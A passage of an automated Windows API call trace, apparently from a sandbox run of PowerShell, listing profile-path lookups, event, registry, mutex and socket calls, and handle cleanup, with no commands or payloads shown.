lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x14e8ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b [0054.073] GetLastError () returned 0x2 [0054.073] SetErrorMode (uMode=0x1) returned 0x1 [0054.073] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x14ed6c | out: lpFileInformation=0x14ed6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0054.073] GetLastError () returned 0x2 [0054.074] SetErrorMode (uMode=0x1) returned 0x1 [0054.074] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x14e8ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x40 [0054.074] GetLastError () returned 0x2 [0054.074] SetErrorMode (uMode=0x1) returned 0x1 [0054.074] GetFileAttributesExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x14ed6c | out: lpFileInformation=0x14ed6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0054.074] GetLastError () returned 0x3 [0054.074] SetErrorMode (uMode=0x1) returned 0x1 [0054.074] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x14e8ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x55 [0054.074] GetLastError () returned 0x3 [0054.074] SetErrorMode (uMode=0x1) returned 0x1 [0054.074] GetFileAttributesExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x14ed6c | out: lpFileInformation=0x14ed6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0054.074] GetLastError () returned 0x3 [0054.074] SetErrorMode (uMode=0x1) returned 0x1 [0054.074] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.074] GetLastError () returned 0xcb [0054.076] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.076] GetLastError () returned 0xcb [0054.077] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.077] GetLastError () returned 0xcb [0054.078] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.078] GetLastError () returned 0xcb [0054.079] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.079] GetLastError () returned 0xcb [0054.081] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.081] GetLastError () returned 0xcb [0054.081] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x374 [0054.081] GetLastError () returned 0x0 [0054.081] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x378 [0054.081] GetLastError () returned 0x0 [0054.081] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x37c [0054.081] GetLastError () returned 0x0 [0054.081] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x380 [0054.082] GetLastError () returned 0x0 [0054.082] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x384 [0054.082] GetLastError () returned 0x0 [0054.082] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3a0 [0054.082] GetLastError () returned 0x0 [0054.082] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x36c [0054.082] GetLastError () returned 0x0 [0054.082] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x38c [0054.082] GetLastError () returned 0x0 [0054.082] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x390 [0054.082] GetLastError () returned 0x0 [0054.082] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x2f8 [0054.082] GetLastError () returned 0x0 [0054.082] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2fc [0054.082] GetLastError () returned 0x0 [0054.082] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x31c [0054.082] GetLastError () returned 0x0 [0054.083] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.083] GetLastError () returned 0xcb [0054.085] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0054.085] GetLastError () returned 0xcb [0054.086] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x14edac | out: lpMode=0x14edac) returned 1 [0054.086] GetLastError () returned 0xcb [0054.087] SetEvent (hEvent=0x380) returned 1 [0054.087] GetLastError () returned 0xcb [0054.087] SetEvent (hEvent=0x374) returned 1 [0054.087] GetLastError () returned 0xcb [0054.087] SetEvent (hEvent=0x378) returned 1 [0054.087] GetLastError () returned 0xcb [0054.087] SetEvent (hEvent=0x37c) returned 1 [0054.087] GetLastError () returned 0xcb [0054.087] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x32c [0054.087] GetLastError () returned 0x0 [0054.088] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.088] GetLastError () returned 0xcb [0054.088] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ec10 | out: phkResult=0x14ec10*=0x330) returned 0x0 [0054.088] RegQueryValueExW (in: hKey=0x330, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x14ec58, lpData=0x0, lpcbData=0x14ec54*=0x0 | out: lpType=0x14ec58*=0x0, lpData=0x0, lpcbData=0x14ec54*=0x0) returned 0x2 [0057.058] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3e8 [0057.058] GetLastError () returned 0x0 [0057.058] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3ec [0057.058] GetLastError () returned 0x0 [0057.058] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3f4 [0057.059] GetLastError () returned 0x0 [0057.059] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x408 [0057.059] GetLastError () returned 0x0 [0057.059] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4c8 [0057.059] GetLastError () returned 0x0 [0057.059] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x388 [0057.059] GetLastError () returned 0x0 [0057.059] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x4f0 [0057.059] GetLastError () returned 0x0 [0057.059] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x4ec [0057.059] GetLastError () returned 0x0 [0057.059] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4f8 [0057.059] GetLastError () returned 0x0 [0057.059] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x4fc [0057.059] GetLastError () returned 0x0 [0057.059] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x500 [0057.059] GetLastError () returned 0x0 [0057.059] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x504 [0057.059] GetLastError () returned 0x0 [0057.059] SetEvent (hEvent=0x408) returned 1 [0057.059] GetLastError () returned 0x0 [0057.059] SetEvent (hEvent=0x3e8) returned 1 [0057.059] GetLastError () returned 0x0 [0057.059] SetEvent (hEvent=0x3ec) returned 1 [0057.059] GetLastError () returned 0x0 [0057.059] SetEvent (hEvent=0x3f4) returned 1 [0057.059] GetLastError () returned 0x0 [0057.059] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x508 [0057.060] GetLastError () returned 0x0 [0057.060] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ec44 | out: phkResult=0x14ec44*=0x50c) returned 0x0 [0057.060] RegQueryValueExW (in: hKey=0x50c, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x14ec8c, lpData=0x0, lpcbData=0x14ec88*=0x0 | out: lpType=0x14ec8c*=0x0, lpData=0x0, lpcbData=0x14ec88*=0x0) returned 0x2 [0057.133] SetEvent (hEvent=0x4c8) returned 1 [0057.133] GetLastError () returned 0x0 [0057.133] SetEvent (hEvent=0x388) returned 1 [0057.133] GetLastError () returned 0x0 [0057.133] SetEvent (hEvent=0x4f0) returned 1 [0057.133] GetLastError () returned 0x0 [0057.164] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0057.164] GetLastError () returned 0xcb [0057.188] SetEvent (hEvent=0x314) returned 1 [0057.189] GetLastError () returned 0xcb [0057.189] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x358040, nSize=0x14ed20 | out: lpNameBuffer="F71GWAT\\BGC6u8Oy yXGxkR", nSize=0x14ed20) returned 0x1 [0057.189] GetLastError () returned 0xcb [0057.189] GetUserNameW (in: lpBuffer=0x3175c0, pcbBuffer=0x14ed28 | out: lpBuffer="BGC6u8Oy yXGxkR", pcbBuffer=0x14ed28) returned 1 [0057.190] ReportEventW (hEventLog=0x4390004, wType=0x4, wCategory=0x4, dwEventID=0x193, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2563cc8*="Stopped", lpRawData=0x2563b84) returned 1 [0057.195] GetLastError () returned 0x0 [0057.196] SetConsoleCtrlHandler (HandlerRoutine=0x0, Add=0) returned 1 [0057.196] GetLastError () returned 0x0 [0057.197] CoGetContextToken (in: pToken=0x14fa58 | out: pToken=0x14fa58) returned 0x0 [0057.197] CObjectContext::QueryInterface () returned 0x0 [0057.197] CObjectContext::GetCurrentThreadType () returned 0x0 [0057.197] Release () returned 0x0 [0057.199] CoGetContextToken (in: pToken=0x14f830 | out: pToken=0x14f830) returned 0x0 [0057.199] CObjectContext::QueryInterface () returned 0x0 [0057.199] CObjectContext::GetCurrentThreadType () returned 0x0 [0057.199] Release () returned 0x0 [0057.205] CoGetContextToken (in: pToken=0x14f830 | out: pToken=0x14f830) returned 0x0 [0057.205] CObjectContext::QueryInterface () returned 0x0 [0057.205] CObjectContext::GetCurrentThreadType () returned 0x0 [0057.205] Release () returned 0x0 [0057.212] CoGetContextToken (in: pToken=0x14f830 | out: pToken=0x14f830) returned 0x0 [0057.212] CObjectContext::QueryInterface () returned 0x0 [0057.213] CObjectContext::GetCurrentThreadType () returned 0x0 [0057.213] Release () returned 0x0 [0057.245] CoGetContextToken (in: pToken=0x14f810 | out: pToken=0x14f810) returned 0x0 [0057.245] CObjectContext::QueryInterface () returned 0x0 [0057.245] CObjectContext::GetCurrentThreadType () returned 0x0 [0057.245] Release () returned 0x0 [0057.246] CoUninitialize () Thread: id = 54 os_tid = 0xb60 Thread: id = 55 os_tid = 0xb64 Thread: id = 56 os_tid = 0xb68 Thread: id = 57 os_tid = 0xb6c Thread: id = 58 os_tid = 0xb70 Thread: id = 59 os_tid = 0xb74 [0048.372] CoGetContextToken (in: pToken=0x3fffaa8 | out: pToken=0x3fffaa8) returned 0x0 [0048.372] CObjectContext::QueryInterface () returned 0x0 [0048.373] CObjectContext::GetCurrentThreadType () returned 0x0 [0048.373] Release () returned 0x0 [0048.373] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0052.297] LocalFree (hMem=0x2e3cb0) returned 0x0 [0052.297] GetLastError () returned 0x0 [0052.297] CloseHandle (hObject=0x31c) returned 1 [0052.297] GetLastError () returned 0x0 [0052.297] CloseHandle (hObject=0x13) returned 1 [0052.297] GetLastError () returned 0x0 [0052.298] CloseHandle (hObject=0xf) returned 1 [0052.298] GetLastError () returned 0x0 [0052.298] RegCloseKey (hKey=0x300) returned 0x0 [0052.298] RegCloseKey (hKey=0x2fc) returned 0x0 [0052.298] RegCloseKey (hKey=0x2f8) returned 0x0 [0052.298] LocalFree (hMem=0x2e3d30) returned 0x0 [0052.298] GetLastError () returned 0x0 [0052.298] RegCloseKey (hKey=0x328) returned 0x0 [0053.387] RegCloseKey (hKey=0x368) returned 0x0 [0053.387] RegCloseKey (hKey=0x364) returned 0x0 [0053.388] RegCloseKey (hKey=0x360) returned 0x0 [0053.388] RegCloseKey (hKey=0x35c) returned 0x0 [0053.388] RegCloseKey (hKey=0x358) returned 0x0 [0053.388] RegCloseKey (hKey=0x354) returned 0x0 [0053.388] RegCloseKey (hKey=0x350) returned 0x0 [0053.388] RegCloseKey (hKey=0x398) returned 0x0 [0053.389] RegCloseKey (hKey=0x394) returned 0x0 [0053.389] RegCloseKey (hKey=0x340) returned 0x0 [0053.389] RegCloseKey (hKey=0x33c) returned 0x0 [0053.389] RegCloseKey (hKey=0x338) returned 0x0 [0053.389] RegCloseKey (hKey=0x334) returned 0x0 [0053.389] RegCloseKey (hKey=0x330) returned 0x0 [0053.390] RegCloseKey (hKey=0x32c) returned 0x0 [0053.390] RegCloseKey (hKey=0x31c) returned 0x0 [0053.390] RegCloseKey (hKey=0x2fc) returned 0x0 [0053.390] RegCloseKey (hKey=0x2f8) returned 0x0 [0053.390] RegCloseKey (hKey=0x390) returned 0x0 [0053.390] RegCloseKey (hKey=0x38c) returned 0x0 [0053.390] RegCloseKey (hKey=0x36c) returned 0x0 [0053.391] RegCloseKey (hKey=0x3a0) returned 0x0 [0053.391] RegCloseKey (hKey=0x384) returned 0x0 [0053.391] RegCloseKey (hKey=0x380) returned 0x0 [0053.391] RegCloseKey (hKey=0x37c) returned 0x0 [0053.391] RegCloseKey (hKey=0x378) returned 0x0 [0053.391] RegCloseKey (hKey=0x374) returned 0x0 [0053.392] RegCloseKey (hKey=0x370) returned 0x0 [0053.392] RegCloseKey (hKey=0x34c) returned 0x0 [0053.392] RegCloseKey (hKey=0x39c) returned 0x0 [0053.392] RegCloseKey (hKey=0x328) returned 0x0 [0057.200] GetLastError () returned 0x0 [0057.200] GetLastError () returned 0x0 [0057.200] LocalFree (hMem=0x322440) returned 0x0 [0057.201] GetLastError () returned 0x0 [0057.201] GetLastError () returned 0x0 [0057.201] GetLastError () returned 0x0 [0057.201] LocalFree (hMem=0x3225d8) returned 0x0 [0057.201] GetLastError () returned 0x0 [0057.201] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2563ef4, cbSid=0x3fff798 | out: pSid=0x2563ef4*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x3fff798) returned 1 [0057.201] GetLastError () returned 0x0 [0057.202] CreateMutexW (lpMutexAttributes=0x2564004, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x528 [0057.202] GetLastError () returned 0x0 [0057.202] WaitForSingleObject (hHandle=0x528, dwMilliseconds=0x1f4) returned 0x0 [0057.202] GetLastError () returned 0x0 [0057.202] ReleaseMutex (hMutex=0x528) returned 1 [0057.202] GetLastError () returned 0x0 [0057.202] CloseHandle (hObject=0x528) returned 1 [0057.202] GetLastError () returned 0x0 [0057.202] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2564210, cbSid=0x3fff798 | out: pSid=0x2564210*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x3fff798) returned 1 [0057.202] GetLastError () returned 0x0 [0057.202] CreateMutexW (lpMutexAttributes=0x2564320, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x528 [0057.202] GetLastError () returned 0x0 [0057.202] WaitForSingleObject (hHandle=0x528, dwMilliseconds=0x1f4) returned 0x0 [0057.202] GetLastError () returned 0x0 [0057.202] ReleaseMutex (hMutex=0x528) returned 1 [0057.202] GetLastError () returned 0x0 [0057.203] CloseHandle (hObject=0x528) returned 1 [0057.203] GetLastError () returned 0x0 [0057.203] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x256452c, cbSid=0x3fff798 | out: pSid=0x256452c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x3fff798) returned 1 [0057.203] GetLastError () returned 0x0 [0057.203] CreateMutexW (lpMutexAttributes=0x256463c, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x528 [0057.203] GetLastError () returned 0x0 [0057.203] WaitForSingleObject (hHandle=0x528, dwMilliseconds=0x1f4) returned 0x0 [0057.203] GetLastError () returned 0x0 [0057.203] ReleaseMutex (hMutex=0x528) returned 1 [0057.203] GetLastError () returned 0x0 [0057.203] CloseHandle (hObject=0x528) returned 1 [0057.203] GetLastError () returned 0x0 [0057.203] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2564848, cbSid=0x3fff798 | out: pSid=0x2564848*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x3fff798) returned 1 [0057.203] GetLastError () returned 0x0 [0057.204] CreateMutexW (lpMutexAttributes=0x2564958, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x528 [0057.204] GetLastError () returned 0x0 [0057.204] WaitForSingleObject (hHandle=0x528, dwMilliseconds=0x1f4) returned 0x0 [0057.204] GetLastError () returned 0x0 [0057.204] ReleaseMutex (hMutex=0x528) returned 1 [0057.204] GetLastError () returned 0x0 [0057.204] CloseHandle (hObject=0x528) returned 1 [0057.204] GetLastError () returned 0x0 [0057.204] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2564b64, cbSid=0x3fff798 | out: pSid=0x2564b64*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x3fff798) returned 1 [0057.204] GetLastError () returned 0x0 [0057.204] CreateMutexW (lpMutexAttributes=0x2564c74, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x528 [0057.204] GetLastError () returned 0x0 [0057.204] WaitForSingleObject (hHandle=0x528, dwMilliseconds=0x1f4) returned 0x0 [0057.204] GetLastError () returned 0x0 [0057.204] ReleaseMutex (hMutex=0x528) returned 1 [0057.204] GetLastError () returned 0x0 [0057.204] CloseHandle (hObject=0x528) returned 1 [0057.204] GetLastError () returned 0x0 [0057.209] setsockopt (s=0x4cc, level=65535, optname=128, optval="\x01", optlen=4) returned 0 [0057.209] GetLastError () returned 0x0 [0057.210] closesocket (s=0x4cc) returned 0 [0057.210] GetLastError () returned 0x0 [0057.212] DeregisterEventSource (hEventLog=0x4390004) returned 1 [0057.218] GetLastError () returned 0x0 [0057.223] CloseHandle (hObject=0x418) returned 1 [0057.223] GetLastError () returned 0x0 [0057.224] CloseHandle (hObject=0x4ec) returned 1 [0057.224] GetLastError () returned 0x0 [0057.224] CloseHandle (hObject=0x4f0) returned 1 [0057.224] GetLastError () returned 0x0 [0057.224] CloseHandle (hObject=0x410) returned 1 [0057.224] GetLastError () returned 0x0 [0057.224] CloseHandle (hObject=0x40c) returned 1 [0057.224] GetLastError () returned 0x0 [0057.225] CloseHandle (hObject=0x3c0) returned 1 [0057.225] GetLastError () returned 0x0 [0057.225] CloseHandle (hObject=0x3bc) returned 1 [0057.225] GetLastError () returned 0x0 [0057.225] CloseHandle (hObject=0x3b8) returned 1 [0057.225] GetLastError () returned 0x0 [0057.225] CloseHandle (hObject=0x388) returned 1 [0057.225] GetLastError () returned 0x0 [0057.225] CloseHandle (hObject=0x3b4) returned 1 [0057.226] GetLastError () returned 0x0 [0057.226] CloseHandle (hObject=0x3b0) returned 1 [0057.226] GetLastError () returned 0x0 [0057.226] CloseHandle (hObject=0x4c8) returned 1 [0057.226] GetLastError () returned 0x0 [0057.226] CloseHandle (hObject=0x408) returned 1 [0057.226] GetLastError () returned 0x0 [0057.227] CloseHandle (hObject=0x3f4) returned 1 [0057.227] GetLastError () returned 0x0 [0057.227] CloseHandle (hObject=0x3ec) returned 1 [0057.227] GetLastError () returned 0x0 [0057.227] CloseHandle (hObject=0x3e8) returned 1 [0057.227] GetLastError () returned 0x0 [0057.227] CloseHandle (hObject=0x368) returned 1 [0057.227] GetLastError () returned 0x0 [0057.227] CloseHandle (hObject=0x364) returned 1 [0057.227] GetLastError () returned 0x0 [0057.228] CloseHandle (hObject=0x360) returned 1 [0057.228] GetLastError () returned 0x0 [0057.228] CloseHandle (hObject=0x35c) returned 1 [0057.228] GetLastError () returned 0x0 [0057.228] CloseHandle (hObject=0x358) returned 1 [0057.228] GetLastError () returned 0x0 [0057.228] CloseHandle (hObject=0x350) returned 1 [0057.228] GetLastError () returned 0x0 [0057.229] CloseHandle (hObject=0x354) returned 1 [0057.229] GetLastError () returned 0x0 [0057.229] CloseHandle (hObject=0x398) returned 1 [0057.229] GetLastError () returned 0x0 [0057.230] setsockopt (s=0x4e4, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0057.230] GetLastError () returned 0x273a [0057.230] closesocket (s=0x4e4) returned 0 [0057.230] GetLastError () returned 0x0 [0057.230] CloseHandle (hObject=0x4e8) returned 1 [0057.230] GetLastError () returned 0x0 [0057.230] setsockopt (s=0x4dc, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0057.230] GetLastError () returned 0x273a [0057.230] closesocket (s=0x4dc) returned 0 [0057.230] GetLastError () returned 0x0 [0057.230] CloseHandle (hObject=0x4d4) returned 1 [0057.230] GetLastError () returned 0x0 [0057.231] CloseHandle (hObject=0x4b8) returned 1 [0057.231] GetLastError () returned 0x0 [0057.231] CloseHandle (hObject=0x4b4) returned 1 [0057.231] GetLastError () returned 0x0 [0057.231] CloseHandle (hObject=0x464) returned 1 [0057.231] GetLastError () returned 0x0 [0057.231] CloseHandle (hObject=0x460) returned 1 [0057.231] GetLastError () returned 0x0 [0057.232] CloseHandle (hObject=0x45c) returned 1 [0057.232] GetLastError () returned 0x0 [0057.232] CloseHandle (hObject=0x458) returned 1 [0057.232] GetLastError () returned 0x0 [0057.232] RegCloseKey (hKey=0x454) returned 0x0 [0057.232] GetLastError () returned 0x0 [0057.233] CloseHandle (hObject=0x450) returned 1 [0057.233] GetLastError () returned 0x0 [0057.233] RegCloseKey (hKey=0x44c) returned 0x0 [0057.233] GetLastError () returned 0x0 [0057.233] CloseHandle (hObject=0x448) returned 1 [0057.233] GetLastError () returned 0x0 [0057.233] RegCloseKey (hKey=0x444) returned 0x0 [0057.233] GetLastError () returned 0x0 [0057.233] RegCloseKey (hKey=0x440) returned 0x0 [0057.233] GetLastError () returned 0x0 [0057.233] CloseHandle (hObject=0x428) returned 1 [0057.233] GetLastError () returned 0x0 [0057.234] RegCloseKey (hKey=0x330) returned 0x0 [0057.234] CloseHandle (hObject=0x32c) returned 1 [0057.234] GetLastError () returned 0x0 [0057.234] CloseHandle (hObject=0x31c) returned 1 [0057.234] GetLastError () returned 0x0 [0057.234] CloseHandle (hObject=0x2fc) returned 1 [0057.234] GetLastError () returned 0x0 [0057.234] CloseHandle (hObject=0x2f8) returned 1 [0057.234] GetLastError () returned 0x0 [0057.234] CloseHandle (hObject=0x390) returned 1 [0057.235] GetLastError () returned 0x0 [0057.235] CloseHandle (hObject=0x38c) returned 1 [0057.235] GetLastError () returned 0x0 [0057.235] CloseHandle (hObject=0x36c) returned 1 [0057.235] GetLastError () returned 0x0 [0057.235] CloseHandle (hObject=0x3a0) returned 1 [0057.235] GetLastError () returned 0x0 [0057.235] CloseHandle (hObject=0x384) returned 1 [0057.235] GetLastError () returned 0x0 [0057.235] CloseHandle (hObject=0x380) returned 1 [0057.235] GetLastError () returned 0x0 [0057.235] CloseHandle (hObject=0x37c) returned 1 [0057.236] GetLastError () returned 0x0 [0057.236] CloseHandle (hObject=0x378) returned 1 [0057.236] GetLastError () returned 0x0 [0057.236] CloseHandle (hObject=0x374) returned 1 [0057.236] GetLastError () returned 0x0 [0057.236] setsockopt (s=0x420, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0057.236] GetLastError () returned 0x273a [0057.236] closesocket (s=0x420) returned 0 [0057.236] GetLastError () returned 0x0 [0057.236] CloseHandle (hObject=0x424) returned 1 [0057.236] GetLastError () returned 0x0 [0057.237] setsockopt (s=0x414, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0057.237] GetLastError () returned 0x273a [0057.237] closesocket (s=0x414) returned 0 [0057.237] GetLastError () returned 0x0 [0057.237] CloseHandle (hObject=0x41c) returned 1 [0057.237] GetLastError () returned 0x0 [0057.237] RegCloseKey (hKey=0x50c) returned 0x0 [0057.237] CloseHandle (hObject=0x508) returned 1 [0057.237] GetLastError () returned 0x0 [0057.237] CloseHandle (hObject=0x504) returned 1 [0057.237] GetLastError () returned 0x0 [0057.238] CloseHandle (hObject=0x500) returned 1 [0057.238] GetLastError () returned 0x0 [0057.238] CloseHandle (hObject=0x4fc) returned 1 [0057.238] GetLastError () returned 0x0 [0057.238] CloseHandle (hObject=0x4f8) returned 1 [0057.238] GetLastError () returned 0x0 [0057.238] CloseHandle (hObject=0x324) returned 1 [0057.238] GetLastError () returned 0x0 [0057.238] RegCloseKey (hKey=0x80000004) returned 0x0 [0057.239] CloseHandle (hObject=0x2e0) returned 1 [0057.239] GetLastError () returned 0x0 [0057.239] CloseHandle (hObject=0x314) returned 1 [0057.239] GetLastError () returned 0x0 [0057.239] UnmapViewOfFile (lpBaseAddress=0x1ea0000) returned 1 [0057.243] UnmapViewOfFile (lpBaseAddress=0x4770000) returned 1 [0057.244] GetLastError () returned 0x0 Thread: id = 60 os_tid = 0xb78 [0054.090] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0054.121] SetThreadUILanguage (LangId=0x0) returned 0x409 [0054.128] VirtualQuery (in: lpAddress=0x51cdff0, lpBuffer=0x51ceff0, dwLength=0x1c | out: lpBuffer=0x51ceff0*(BaseAddress=0x51cd000, AllocationBase=0x4840000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0054.131] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x393360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.131] GetLastError () returned 0xcb [0054.133] GetEnvironmentVariableW 